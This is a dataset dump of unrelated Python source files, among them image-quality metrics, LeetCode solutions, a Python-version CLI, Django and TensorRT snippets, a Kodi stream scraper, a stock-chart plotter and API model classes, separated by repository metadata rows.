_, height, width, _ = img1.shape
# Filter size can't be larger than height or width of images.
size = min(filter_size, height, width)
# Scale down sigma if a smaller filter size is used.
sigma = size * filter_sigma / filter_size if filter_size else 0
if filter_size:
window = np.reshape(FSpecialGauss(size, sigma), (1, size, size, 1))
mu1 = signal.fftconvolve(img1, window, mode='valid')
mu2 = signal.fftconvolve(img2, window, mode='valid')
sigma11 = signal.fftconvolve(img1 * img1, window, mode='valid')
sigma22 = signal.fftconvolve(img2 * img2, window, mode='valid')
sigma12 = signal.fftconvolve(img1 * img2, window, mode='valid')
else:
# Empty blur kernel so no need to convolve.
mu1, mu2 = img1, img2
sigma11 = img1 * img1
sigma22 = img2 * img2
sigma12 = img1 * img2
mu11 = mu1 * mu1
mu22 = mu2 * mu2
mu12 = mu1 * mu2
sigma11 -= mu11
sigma22 -= mu22
sigma12 -= mu12
# Calculate intermediate values used by both ssim and cs_map.
c1 = (k1 * max_val)**2
c2 = (k2 * max_val)**2
v1 = 2.0 * sigma12 + c2
v2 = sigma11 + sigma22 + c2
ssim = np.mean((((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2)))
cs = np.mean(v1 / v2)
return ssim, cs
def MultiScaleSSIM(img1,
img2,
max_val=255,
filter_size=11,
filter_sigma=1.5,
k1=0.01,
k2=0.03,
weights=None):
"""Return the MS-SSIM score between `img1` and `img2`.
This function implements Multi-Scale Structural Similarity (MS-SSIM) Image
Quality Assessment according to Zhou Wang's paper, "Multi-scale structural
similarity for image quality assessment" (2003).
Link: https://ece.uwaterloo.ca/~z70wang/publications/msssim.pdf
Author's MATLAB implementation:
http://www.cns.nyu.edu/~lcv/ssim/msssim.zip
Args:
img1: Numpy array holding the first RGB image batch.
img2: Numpy array holding the second RGB image batch.
max_val: the dynamic range of the images (i.e., the difference between the
maximum the and minimum allowed values).
filter_size: Size of blur kernel to use (will be reduced for small images).
filter_sigma: Standard deviation for Gaussian blur kernel (will be reduced
for small images).
k1: Constant used to maintain stability in the SSIM calculation (0.01 in
the original paper).
k2: Constant used to maintain stability in the SSIM calculation (0.03 in
the original paper).
weights: List of weights for each level; if none, use five levels and the
weights from the original paper.
Returns:
MS-SSIM score between `img1` and `img2`.
Raises:
RuntimeError: If input images don't have the same shape or don't have four
dimensions: [batch_size, height, width, depth].
"""
if img1.shape != img2.shape:
raise RuntimeError('Input images must have the same shape (%s vs. %s).', img1.shape, img2.shape)
if img1.ndim != 4:
raise RuntimeError('Input images must have four dimensions, not %d', img1.ndim)
# Note: default weights don't sum to 1.0 but do match the paper / matlab code.
weights = np.array(weights if weights else [0.0448, 0.2856, 0.3001, 0.2363, 0.1333])
levels = weights.size
downsample_filter = np.ones((1, 2, 2, 1)) / 4.0
im1, im2 = [x.astype(np.float64) for x in [img1, img2]]
mssim = np.array([])
mcs = np.array([])
for _ in range(levels):
ssim, cs = SSIMForMultiScale(
im1, im2, max_val=max_val, filter_size=filter_size, filter_sigma=filter_sigma, k1=k1, k2=k2)
mssim = np.append(mssim, ssim)
mcs = np.append(mcs, cs)
filtered = [convolve(im, downsample_filter, mode='reflect') for im in [im1, im2]]
im1, im2 = [x[:, ::2, ::2, :] for x in filtered]
return (
np.prod(mcs[0:levels - 1]**weights[0:levels - 1]) * (mssim[levels - 1]**weights[levels - 1]))
| [
"mrinal.haloi11@gmail.com"
] | mrinal.haloi11@gmail.com |
4f32bf298e54f2f7987c626a660c4c19e9fadff2 | 9645bdfbb15742e0d94e3327f94471663f32061a | /Python/1034 - Coloring A Border/1034_coloring-a-border.py | 2b493c2baf0f2c8e7cf4f6570d80120a55d84abc | [] | no_license | aptend/leetcode-rua | f81c080b2260adb2da677612e5c437eda256781d | 80e44f4e9d3a5b592fdebe0bf16d1df54e99991e | refs/heads/master | 2023-06-22T00:40:05.533424 | 2021-03-17T13:51:28 | 2021-03-17T13:51:28 | 186,434,133 | 2 | 0 | null | 2023-06-21T22:12:51 | 2019-05-13T14:17:27 | HTML | UTF-8 | Python | false | false | 1,109 | py | from leezy import solution, Solution
class Q1034(Solution):
@solution
def colorBorder(self, grid, r0, c0, color):
# 152ms 87.36%
M, N = len(grid), len(grid[0])
old_c = grid[r0][c0]
dirs = [(1, 0), (-1, 0), (0, 1), (0, -1)]
def dfs(i, j, border):
is_border_cell = False
for di, dj in dirs:
ni, nj = i + di, j + dj
if not (0 <= ni < M and 0 <= nj < N):
is_border_cell = True
continue
if grid[ni][nj] != old_c:
if grid[ni][nj] != -1:
is_border_cell = True
continue
grid[i][j] = -1
dfs(ni, nj, border)
grid[i][j] = old_c
if is_border_cell:
border.append((i, j))
border = []
dfs(r0, c0, border)
for i, j in border:
grid[i][j] = color
return grid
def main():
q = Q1034()
q.add_args([[1, 1], [1, 2]], 0, 0, 3)
q.run()
if __name__ == '__main__':
main()
| [
"crescentwhale@hotmail.com"
] | crescentwhale@hotmail.com |
73a825ef1c4e66bae05685af1cb2546236b23287 | 651802447b606e46fe1aee0490458bf4261661a0 | /snafu/__main__.py | 9ef2a936acf4d4f5457ea42a60652dafd000886a | [
"ISC"
] | permissive | MysteriousSonOfGod/snafu | e90a9101dd41c0523c4da529c28fffbe1814b13f | ddcbf8dc8f26fbab6f352058d4b3e62fd01ea331 | refs/heads/master | 2022-03-01T15:19:37.822762 | 2019-10-28T06:31:03 | 2019-10-28T06:31:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,625 | py | import click
class SnafuGroup(click.Group):
"""Force command name to 'snafu'.
"""
def make_context(self, info_name, *args, **kwargs):
return super().make_context('snafu', *args, **kwargs)
@click.group(cls=SnafuGroup, invoke_without_command=True)
@click.option('--version', is_flag=True, help='Print version and exit.')
@click.pass_context
def cli(ctx, version):
if ctx.invoked_subcommand is None:
if version:
from . import __version__
click.echo('SNAFU {}'.format(__version__))
else:
click.echo(ctx.get_help(), color=ctx.color)
ctx.exit(1)
@cli.command(help='Install a Python version.')
@click.argument('version')
@click.option('--use', is_flag=True, help='Use version after installation.')
@click.option(
'--file', 'from_file', type=click.Path(exists=True),
help='Specify an installer to not downloading one.',
)
def install(**kwargs):
from .operations.install import install
install(**kwargs)
@cli.command(help='Uninstall a Python version.')
@click.argument('version')
@click.option(
'--file', 'from_file', type=click.Path(exists=True),
help='Specify an uninstaller to not relying on auto-discovery.',
)
def uninstall(**kwargs):
from .operations.install import uninstall
uninstall(**kwargs)
@cli.command(help='Upgrade an installed Python version.')
@click.argument('version')
@click.option('--pre', is_flag=True, help='Include pre-releases.')
@click.option(
'--file', 'from_file', type=click.Path(exists=True),
help='Specify path to installer to not downloading one.',
)
@click.pass_context
def upgrade(ctx, **kwargs):
from .operations.install import upgrade
upgrade(ctx, **kwargs)
@cli.command(help='Download installer of given Python version.')
@click.argument('version')
@click.option(
'--dest', 'dest_dir', type=click.Path(exists=True, file_okay=False),
help='Download installer to this directory.',
)
@click.option('--force', is_flag=True, help='Overwrite target if exists.')
@click.pass_context
def download(ctx, **kwargs):
from .operations.download import download
download(ctx, **kwargs)
@cli.command(help='Set active Python versions.')
@click.argument('version', nargs=-1)
@click.option(
'--add/--reset', default=None, help='Add version to use without removing.',
)
@click.pass_context
def use(ctx, **kwargs):
from .operations.link import use
use(ctx, **kwargs)
@cli.command(
help='Prints where the executable of Python version is.',
short_help='Print python.exe location.',
)
@click.argument('version')
def where(**kwargs):
from .operations.versions import where
where(**kwargs)
@cli.command(name='list', help='List Python versions.')
@click.option(
'--all', 'list_all', is_flag=True,
help='List all versions (instead of only installed ones).',
)
def list_(**kwargs):
from .operations.versions import list_
list_(**kwargs)
@cli.command(
short_help='Link a command from active versions.',
help=('Link a command, or all commands available based on the currently '
'used Python version(s).'),
)
@click.argument('command', required=False)
@click.option(
'--all', 'link_all', is_flag=True,
help='Link all available operations.',
)
@click.option(
'--overwrite',
type=click.Choice(['yes', 'no', 'smart']), default='yes',
help='What to do when the target exists.',
)
@click.pass_context
def link(ctx, overwrite, **kwargs):
from .operations.link import link, Overwrite
link(ctx, overwrite=Overwrite[overwrite], **kwargs)
if __name__ == '__main__':
cli()
| [
"uranusjr@gmail.com"
] | uranusjr@gmail.com |
c793e91c6245dd84a9885fc97963c0193af6dcff | 1ae95a907eda38bc49dba5ce24309a0d134a2fd8 | /vladetina1/asgi.py | ede8d3a4e475252fb3a279974f137e0c6ed195b8 | [] | no_license | ivanurban/vladetina_1-webapp | e43472edbf87485d1b606c9827988f7353adcf02 | c37eea232b2fde654cb2de006a2c3d2fea838047 | refs/heads/master | 2022-12-08T04:56:11.729653 | 2020-08-28T22:36:35 | 2020-08-28T22:36:35 | 289,579,399 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | """
ASGI config for vladetina1 project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'vladetina1.settings')
application = get_asgi_application()
| [
"ivanurban_bg@yahoo.com"
] | ivanurban_bg@yahoo.com |
e3860c147e56b05bdb47ca332ac3184f12e860cd | 3326e1455f857704d144d069ffd0291ef3da830e | /torch2trt_dynamic/plugins/create_gridsample_plugin.py | d42250f0bd94f558c33dc7cb0ab0ea86bf1ecba4 | [
"MIT"
] | permissive | AlanLu0808/torch2trt_dynamic | efc5b3d6cbaffffa43ad28f107ab3588bf135d5e | df864f906a8ae0b7b98680c1612903bdea58c744 | refs/heads/master | 2023-04-30T12:52:20.907104 | 2021-05-09T03:28:19 | 2021-05-09T03:28:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | import numpy as np
import tensorrt as trt
def create_gridsample_plugin(layer_name, mode, padding_mode, align_corners):
creator = trt.get_plugin_registry().get_plugin_creator(
'GridSamplePluginDynamic', '1', '')
pfc = trt.PluginFieldCollection()
pf_mode = trt.PluginField("mode", np.array([mode], dtype=np.int32),
trt.PluginFieldType.INT32)
pfc.append(pf_mode)
pf_padding_mode = trt.PluginField("padding_mode",
np.array([padding_mode], dtype=np.int32),
trt.PluginFieldType.INT32)
pfc.append(pf_padding_mode)
pf_align_corners = trt.PluginField(
"align_corners", np.array([align_corners], dtype=np.int32),
trt.PluginFieldType.INT32)
pfc.append(pf_align_corners)
return creator.create_plugin(layer_name, pfc)
| [
"streetyao@live.com"
] | streetyao@live.com |
6164689de25188831b5f04895aff856313ea43e2 | 9495b91cbed933a55be172c2397c4083b5354faa | /app/user/models.py | 0049a926fd00e9db2e3cfc84072e7112ed029ab6 | [] | no_license | huyquyet/MMS_project | 2f20fff079d201716bdd3f38f204dc3d06f1bada | 01596fe39b41b4c1de29b15233fdf22639a21770 | refs/heads/master | 2021-01-10T10:09:44.045152 | 2015-11-16T10:37:41 | 2015-11-16T10:37:41 | 45,814,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | from django.contrib.auth.models import User
from django.db import models
# Create your models here.
from MMS_project import settings
from app.position.models import Position
from app.team.models import Team
class Profile(models.Model):
user = models.OneToOneField(User, related_name='profile')
avata = models.ImageField(upload_to=settings.AVATA_DIR, max_length=255, default='avata/default.jpg', blank=False)
description = models.TextField(default='', null=True)
team = models.ForeignKey(Team, related_name='user', default=4, null=True)
position = models.ForeignKey(Position, related_name='profile', default=1, null=True)
# def delete(self, *args, **kwargs):
# self.user.delete()
# return super(self.__class__, self).delete(*args, **kwargs)
| [
"nguyenhuyquyet90@gmail.com"
] | nguyenhuyquyet90@gmail.com |
5c4f76c6e2b0ef09d415ea9640c17610cfa0689b | 01fa2aca31eb73a559d192fd29e44350f26a13a9 | /HAX/18.CocoJoe/script.module.civitasscrapers/lib/civitasscrapers/sources_civitasscrapers/en/reddit.py | 4cd237137522d81a2fb22aa55a6be1f0a9cdb1f0 | [] | no_license | RandomIntermition/k4y108837s | b4beedeff375645bd4fa9ad348631a9a9f3640b6 | e9115aad49795dfe30a96c278cedaf089abcc11d | refs/heads/master | 2022-05-01T18:45:57.298903 | 2022-03-30T03:41:08 | 2022-03-30T03:41:08 | 109,356,425 | 1 | 0 | null | 2019-11-08T02:20:47 | 2017-11-03T05:36:48 | Python | UTF-8 | Python | false | false | 2,249 | py | # -*- coding: utf-8 -*-
'''
Eggman Add-on
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle,client,proxy
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['reddit.com']
self.base_link = 'https://www.reddit.com/user/nbatman/m/streaming2/search?q=%s&restrict_sr=on'
def movie(self, imdb, title, localtitle, aliases, year):
try:
title = cleantitle.geturl(title)
title = title.replace('-','+')
query = '%s+%s' % (title,year)
url = self.base_link % query
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = client.request(url)
try:
match = re.compile('class="search-title may-blank" >(.+?)</a>.+?<span class="search-result-icon search-result-icon-external"></span><a href="(.+?)://(.+?)/(.+?)" class="search-link may-blank" >').findall(r)
for info,http,host,ext in match:
if '2160' in info: quality = '4K'
elif '1080' in info: quality = '1080p'
elif '720' in info: quality = 'HD'
elif '480' in info: quality = 'SD'
else: quality = 'SD'
url = '%s://%s/%s' % (http,host,ext)
if 'google' in host: host = 'GDrive'
if 'Google' in host: host = 'GDrive'
if 'GOOGLE' in host: host = 'GDrive'
sources.append({
'source': host,
'quality': quality,
'language': 'en',
'url': url,
'info': info,
'direct': False,
'debridonly': False
})
except:
return
except Exception:
return
return sources
def resolve(self, url):
return url
| [
"github+github@github.github"
] | github+github@github.github |
56b08623e6f1caaa20f3bd30c23264c4a592c151 | 5085dfd5517c891a1f5f8d99bf698cd4bf3bf419 | /087.py | 05cfccf10e07977157fcd34d680304b9ba743426 | [] | no_license | Lightwing-Ng/100ExamplesForPythonStarter | 01ffd4401fd88a0b997656c8c5f695c49f226557 | 56c493d38a2f1a1c8614350639d1929c474de4af | refs/heads/master | 2020-03-10T22:07:37.340512 | 2018-04-15T13:16:30 | 2018-04-15T13:16:30 | 129,611,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
"""
* @author: Lightwing Ng
* email: rodney_ng@iCloud.com
* created on Apr 15, 2018, 7:37 PM
* Software: PyCharm
* Project Name: Tutorial
题目:回答结果(结构体变量传递)。
程序分析:无。
"""
class student:
x, c = 0, 0
def f(stu):
stu.x = 20
stu.c = 'c'
a = student()
a.x = 3
a.c = 'a'
f(a)
print(a.x, a.c)
| [
"rodney_ng@icloud.com"
] | rodney_ng@icloud.com |
84edb83be95037a7358797df88f5c9ca2978d486 | 53312f6eea68e95990923f9159e721f1c018b630 | /app/services/company_services.py | 6e5e4e381b04cd4c20520d51516a4a6b66c59af5 | [] | no_license | BrunoGehlen/stocks_app | 22978ba22c48af73263ce4bd18a2f985609eefe7 | c496bafb8475f6557de29043fb98b366f1b01371 | refs/heads/master | 2023-04-14T20:46:45.786460 | 2021-05-03T20:35:42 | 2021-05-03T20:35:42 | 363,943,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,179 | py | from . import datetime, timedelta, HTTPStatus
from app.serializers.company_schema import CompanySchema
from app.models.company_model import CompanyModel
class CompanyServices:
def __init__(self, session):
self.session = session
self.todays_datetime = datetime(
datetime.today().year, datetime.today().month, datetime.today().day
)
def get(self, request):
companies = CompanyModel.query.all()
with self.session.no_autoflush:
for company in companies:
company.transactions = [
transaction
for transaction in company.transactions
if (self.todays_datetime - transaction.transaction_date)
< timedelta(hours=1)
]
# companies = [
# company
# for company in companies
# if all(
# (self.todays_datetime - transaction.transaction_date)
# < timedelta(days=1)
# for transaction in company.transacions
# )
# ]
return {"companies": CompanySchema(many=True).dump(companies)}, HTTPStatus.OK
| [
"you@example.com"
] | you@example.com |
15a91ca627f134ace4c89c131bedcf65cb1b99c4 | 00a086a141acc551c9e3aa23356013cdc8d61b61 | /LeetCode/python/lc021.py | 088a2b04cf2168f0f69ff793b21152f69dd47441 | [] | no_license | ZwEin27/Coding-Training | f01cebbb041efda78bca4bf64e056133d7b7fad7 | 409109478f144791576ae6ca14e2756f8f2f5cb0 | refs/heads/master | 2021-01-18T12:25:06.081821 | 2016-09-04T17:43:44 | 2016-09-05T17:43:44 | 29,571,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | #!/usr/bin/env python
# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# @param {ListNode} l1
# @param {ListNode} l2
# @return {ListNode}
def mergeTwoLists(self, l1, l2):
if not l1 and not l2:
return [];
elif not l1 and l2:
return l2;
elif l1 and not l2:
return l1;
result = [];
if l1.val <= l2.val:
result = l1;
result.next = self.mergeTwoLists(l1.next, l2);
elif l1.val > l2.val:
result = l2;
result.next = self.mergeTwoLists(l1, l2.next);
return result;
| [
"zwein27@gmail.com"
] | zwein27@gmail.com |
3980853af39a2d0a86828f26258a712df25ceefd | a47e4026ab8f791518d0319c5f3ec8c5a8afec2e | /Terrain/midlout2h.py | 84d08a8f8039a4bade027f5f33d7513e5de75c2f | [] | no_license | bobbyrward/horrible-terrain-demo | 715064fd020a620751b0c99f0a324300dd4e387e | 55c9add73f5179b4272538950ec8a713dbed88b2 | refs/heads/master | 2016-09-06T08:29:53.623401 | 2009-10-28T19:20:24 | 2009-10-28T19:20:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | import re
import sys
hresult_re = re.compile(r'STDMETHOD\((.*?)\)\(\s*THIS_?\s*(.*?)\)\s*PURE\s*;\s*')
rval_re = re.compile(r'STDMETHOD_\((.*?), (.*?)\)\(\s*THIS_?\s*(.*?)\)\s*PURE\s*;\s*')
# this
"""STDMETHOD(EndStateBlock)(THIS_ IDirect3DStateBlock9** ppSB) PURE;
"""
# to this
"""HRESULT EndStateBlock(IDirect3DStateBlock9** ppSB) {
return (*this)->EndStateBlock(ppSB);
}
"""
def output_func_call(outfile, rval, name, params):
splitParams = [ x.strip().rsplit(' ', 1) for x in params.split(',') ]
if len(splitParams) == 1 and len(splitParams[0]) == 1:
outfile.write("\t\t%s %s() {\n" % (rval, name))
outfile.write("\t\t\treturn (*this)->%s();\n" % name)
outfile.write("\t\t}\n\n")
else:
outfile.write("\t\t%s %s(%s) {\n" %(rval, name, params))
param_names = ', '.join([ x[1].strip('*') for x in splitParams ])
outfile.write("\t\t\treturn (*this)->%s(%s);\n" % (name, param_names))
outfile.write("\t\t}\n\n")
with open('device_in.txt') as fd:
with open('device_method_calls.h', 'w') as outfile:
outfile.write('/*************************************************/\n')
outfile.write('/* This file is autogenerated by midlout2h. */\n')
outfile.write('/* DO NOT EDIT */\n')
outfile.write('/*************************************************/\n')
outfile.write('\n')
for line in fd:
print line
if hresult_re.match(line):
output_func_call(outfile, 'HRESULT', *hresult_re.match(line).groups())
elif rval_re.match(line):
output_func_call(outfile, *rval_re.match(line).groups())
else:
if(line.strip()):
raise RuntimeError('Unmatchable line "%s"' % line)
| [
"bobbyrward@gmail.com"
] | bobbyrward@gmail.com |
64466beaf3a967d6e4a630cb489949ec77b7de52 | 17a655d21d7ddaf8cf60e23055e107cb602bd9bc | /project/bookmarker/signals.py | f25b97e867ff7e735283ada57d8066db7ebe124d | [] | no_license | geofferyj/YouTubeVideoBookmarker | fedb6913a8c5118c0a51f011244233630cf6f58c | fbf10230c5184cd1479dddafbcfd3609d5ac98f1 | refs/heads/master | 2023-08-04T22:30:37.636957 | 2021-03-01T08:09:46 | 2021-03-01T08:09:46 | 278,203,783 | 0 | 0 | null | 2021-09-22T19:46:09 | 2020-07-08T22:05:00 | JavaScript | UTF-8 | Python | false | false | 1,646 | py | from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
from bookmarker.models import Token, Video, ResetableViews, Subscription, VoicePause, VoicePlay
# VoicePause
@receiver(post_save, sender=User)
def create_voicepause(sender, instance, created, **kwargs):
if created:
VoicePause.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_voicepause(sender, instance, **kwargs):
instance.voice_pause.save()
# VoicePlay
@receiver(post_save, sender=User)
def create_voiceplay(sender, instance, created, **kwargs):
if created:
VoicePlay.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_voiceplay(sender, instance, **kwargs):
instance.voice_play.save()
# Token
@receiver(post_save, sender=User)
def create_token(sender, instance, created, **kwargs):
if created:
Token.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_token(sender, instance, **kwargs):
instance.tokens.save()
# Subscription
@receiver(post_save, sender=User)
def create_subscription(sender, instance, created, **kwargs):
if created:
Subscription.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_subscription(sender, instance, **kwargs):
instance.subscription.save()
# ResetableViews
@receiver(post_save, sender=Video)
def create_rviews(sender, instance, created, **kwargs):
if created:
ResetableViews.objects.create(video=instance)
@receiver(post_save, sender=Video)
def save_rviews(sender, instance, **kwargs):
instance.rviews.save()
| [
"geofferyjoseph1@gmail.com"
] | geofferyjoseph1@gmail.com |
0efe422b2d4a7ed61c38d320817a656491c43136 | 4809471274d6e136ac66d1998de5acb185d1164e | /pypureclient/flasharray/FA_2_5/models/alert_event_get_response.py | 277b06b6969aff3effbb0edb3555fb2a5e1c3824 | [
"BSD-2-Clause"
] | permissive | astrojuanlu/py-pure-client | 053fef697ad03b37ba7ae21a0bbb466abf978827 | 6fa605079950765c316eb21c3924e8329d5e3e8a | refs/heads/master | 2023-06-05T20:23:36.946023 | 2021-06-28T23:44:24 | 2021-06-28T23:44:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,805 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class AlertEventGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
'items': 'list[AlertEvent]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.AlertEvent]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[AlertEvent])
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `AlertEventGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AlertEventGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AlertEventGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hubert.chan@purestorage.com"
] | hubert.chan@purestorage.com |
fef2f7c9212ccab6017d6dd21a22597a88f51592 | fa6612470d814f365280b0480b14748f27c1333c | /Data Visualization with Matplotlib/23_sharexAxis.py | 5e67e5f9cf5ee0bce913dac588aef4e1792b6f97 | [] | no_license | SaretMagnoslove/Practical_Machine_Learning_with_python | ffca9da49774d6bf4c459960a691b8dc351f8f1f | 2e426cecb99831bba75ff2faad1d61f1b802dacb | refs/heads/master | 2020-03-23T02:16:24.274694 | 2018-09-25T23:19:51 | 2018-09-25T23:19:51 | 140,965,770 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,683 | py | import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.ticker as mticker
from matplotlib.dates import bytespdate2num
from matplotlib.finance import candlestick_ohlc
from matplotlib import style
import numpy as np
import urllib
# style.use('ggplot')
style.use('fivethirtyeight')
MA1 = 10
MA2 = 30
def moving_average(values, window):
weights = np.repeat(1.0, window) / window
smas = np.convolve(values, weights, 'valid')
return smas
def highes_minus_lows(highs, lows):
return highs - lows
def graph_data(stock):
fig = plt.figure()
ax1 = plt.subplot2grid((6, 1), (0, 0), rowspan=1, colspan=1)
plt.title(stock)
plt.ylabel('H-l')
ax2 = plt.subplot2grid((6, 1), (1, 0), rowspan=4, colspan=1, sharex=ax1)
plt.ylabel('Price')
ax3 = plt.subplot2grid((6, 1), (5, 0), rowspan=1, colspan=1, sharex=ax1)
plt.ylabel('MovingAvg')
# Unfortunately, Yahoo's API is no longer available
# feel free to adapt the code to another source, or use this drop-in replacement.
stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement'
source_code = urllib.request.urlopen(stock_price_url).read().decode()
stock_data = []
split_source = source_code.split('\n')
for line in split_source[1:]:
split_line = line.split(',')
if len(split_line) == 7:
if 'values' not in line and 'labels' not in line:
stock_data.append(line)
date, closep, highp, lowp, openp, adj_closep, volume = np.loadtxt(
stock_data,
delimiter=',',
unpack=True,
converters={0: bytespdate2num('%Y-%m-%d')})
x, y, ohlc = 0, len(date), []
while x < y:
append_me = date[x], openp[x], highp[x], lowp[x], closep[x], volume[x]
ohlc.append(append_me)
x += 1
ma1 = moving_average(closep, MA1)
ma2 = moving_average(closep, MA2)
start = len(date[MA2 - 1:])
h_l = [highes_minus_lows(h, l) for h, l in zip(highp, lowp)]
# h_l = list(map(highes_minus_lows, highp, lowp))
ax1.plot_date(date[-start:], h_l[-start:], '-')
ax1.yaxis.set_major_locator(mticker.MaxNLocator(nbins=4, prune='lower'))
candlestick_ohlc(ax2, ohlc[-start:], width=0.4, colorup='g', colordown='r')
for label in ax2.xaxis.get_ticklabels():
label.set_rotation(45)
ax2.yaxis.set_major_locator(mticker.MaxNLocator(nbins=7, prune='upper'))
ax2.grid(True)
bbox_props = dict(boxstyle='larrow', fc='w', ec='k', lw=1)
ax2.annotate(
str(closep[-1]), (date[0], closep[-1]),
xytext=(date[0] + 400, closep[-1]),
bbox=bbox_props)
ax3.plot(date[-start:], ma1[-start:], linewidth=1)
ax3.plot(date[-start:], ma2[-start:], linewidth=1)
ax3.fill_between(
date[-start:],
ma2[-start:],
ma1[-start:],
where=(ma1[-start:] < ma2[-start:]),
facecolor='r',
edgecolor='r',
alpha=0.5)
ax3.fill_between(
date[-start:],
ma2[-start:],
ma1[-start:],
where=(ma1[-start:] > ma2[-start:]),
facecolor='g',
edgecolor='g',
alpha=0.5)
ax3.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
ax3.xaxis.set_major_locator(mticker.MaxNLocator(10))
ax3.yaxis.set_major_locator(mticker.MaxNLocator(nbins=4, prune='upper'))
for label in ax3.xaxis.get_ticklabels():
label.set_rotation(45)
plt.setp(ax1.get_xticklabels(), visible=False)
plt.setp(ax2.get_xticklabels(), visible=False)
plt.subplots_adjust(
left=0.11, bottom=0.24, right=0.90, top=0.90, wspace=0.2, hspace=0)
plt.show()
graph_data('EBAY')
| [
"magnoslove@gmail.com"
] | magnoslove@gmail.com |
8427a365418b51b3933a3c9fc1d994443f00f617 | a3eb732ead7e1d10a85a88e42dc639eb16a40265 | /instagram_api/response/archived_stories_feed.py | e0ea4adece55f9e2c80964fe8585b77857ed3be3 | [
"MIT"
] | permissive | carsam2021/instagram_api | 7654c0f485c22935cf478016e46e65acbeda9344 | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | refs/heads/master | 2023-03-16T14:06:27.515432 | 2020-10-17T04:39:19 | 2020-10-17T04:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | from .mapper import ApiResponse, ApiResponseInterface
from .mapper.types import Timestamp, AnyType
from .model import ArchivedStoriesFeedItem
__all__ = ['ArchivedStoriesFeedResponse']
